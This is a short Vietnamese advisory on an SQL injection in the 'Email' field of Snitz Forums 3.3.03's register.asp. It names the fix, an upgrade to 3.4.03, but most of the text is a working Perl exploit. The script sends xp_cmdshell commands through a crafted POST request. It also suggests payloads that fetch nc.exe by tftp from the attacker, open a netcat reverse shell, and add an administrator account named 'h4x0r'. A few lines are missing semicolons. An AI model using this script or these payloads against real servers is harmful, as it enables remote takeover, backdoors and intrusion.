Snitz Forums 3.3.03 có một lỗi SQL injection ngay trong trang "register.asp" với biến
"Email" của nó. Do "register.asp" không kiểm tra user nhập vào, user từ xa có thể thi
hành chuỗi lệnh (như là "xp_cmdshell") trái phép lên hệ thống.
Version bị ảnh hưởng:
3.3.03
và có thể những version trước đây (chưa test)
Giải pháp:
Nâng cấp lên bản 3.4.03.
Khai thác:
#!/usr/bin/perl
use Socket;
print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}
print "\nWeb server port? [80]: ";
my $port = <STDIN>
chomp $port;
if( $port eq "" )
{
$port = 80;
}
print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}
print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>
chomp $command;
$command =~ s/\ /\%20/g;
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command.
"\'\%20--\&Name\=snitz";
my $length = length( $data2 );
print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
close( FILEHANDLE );
}
sub open_TCP
{
my( $FS, $dest, $port ) = @_;
my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;
my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}
